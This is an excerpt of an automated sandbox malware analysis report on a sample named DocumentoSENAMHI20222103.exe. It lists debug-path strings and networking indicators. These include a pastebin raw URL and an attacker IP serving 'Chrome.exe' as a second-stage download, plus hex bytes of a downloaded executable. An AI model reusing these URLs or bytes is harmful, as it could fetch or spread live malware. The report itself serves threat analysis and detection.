                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: PIN.pdbX source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
                      Source: Binary string: wuser32.pdbUGP source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BDA22B FindFirstFileExW,1_2_00BDA22B

                      Networking

                      barindex
                      Source: unknownDNS query: name: pastebin.com
                      Source: Malware configuration extractorURLs: https://pastebin.com/raw/03PEm7js
                      Source: Malware configuration extractorURLs: 172.111.242.20
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: global trafficHTTP traffic detected: GET /raw/03PEm7js HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Mar 2022 13:44:48 GMTServer: Apache/2.2.8 (Win32)Last-Modified: Thu, 10 Mar 2022 10:08:40 GMTETag: "300000003618c-7200-5d9da65f94fe9"Accept-Ranges: bytesContent-Length: 29184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 20 ce 29 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 00 00 00 02 00 00 00 00 00 00 6e 8d 00 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 8d 00 00 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 6d 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 8d 00 00 00 00 00 00 48 00 00 00 02 00 05 00 60 47 00 00 bc 45 00 00 03 00 00 00 56 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 2e 7e 01 00 00 04 6f 0a 00 00 0a 2a 2e 7e 02 00 00 04 6f 0b 00 00 0a 2a 2e 7e 03 00 00 04 6f 0c 00 00 0a 2a 2e 7e 04 00 00 04 6f 0d 00 00 0a 2a 36 02 03 28 11 00 00 0a 28 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 2e d0 05 00 00 02 28 14 00 00 0a 2a 1e 02 28 15 00 00 0a 2a 13 30 01 00 14 00 00 00 01 00 00 11 02 8c 05 00 00 1b 2d 08 28 01 00 00 2b 0a 2b 02 02 0a 06 2a 22 03 fe 15 05 00 00 1b 2a 1e 02 28 17 00 00 0a 2a 72 7e 1b 00 00 0a 8c 07 00 00 1b 2d 0a 28 02 00 00 2b 80 1b 00 00 0a 7e 1b 00 00 0a 2a 1e 02 1b 30 04 00 a0 00 00 00 02 00 00 11 28 14 00 00 06 2d 57 28 19 00 00 06 6f 15 00 00 0a 6f 1d 00 00 0a 72 01 00 00 70 28 1d 00 00 0a 6f 1e 00 00 0a 2d 37 72 07 00 00 70 28 12 00 00 06 2d 2b 28 1f 00 00 0a 2d 24 28 20 0
                      Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.11.20:49764 version: TLS 1.0
                      Source: Joe Sandbox ViewASN Name: M247GB M247GB
                      Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
                      Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.111.242.20/Chrome.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502359719.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80684755991.00000000011D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.111.242.20/Chrome.exeTTC:
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.111.242.20/Chrome.exelr
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502024723.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.111.242.20/Chrome.exen
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502024723.00000000011B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.111.242.20/Chrome.exer
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: chrome.exe, 00000012.00000003.82992577299.000000000693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.80812254353.000000000692D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.80807475866.000000000691C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.83006571488.000000000693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83519302926.0000000006931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: chrome.exe, 00000012.00000003.82992577299.000000000693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.80812254353.000000000692D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.80807475866.000000000691C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.83006571488.000000000693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83519302926.0000000006931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
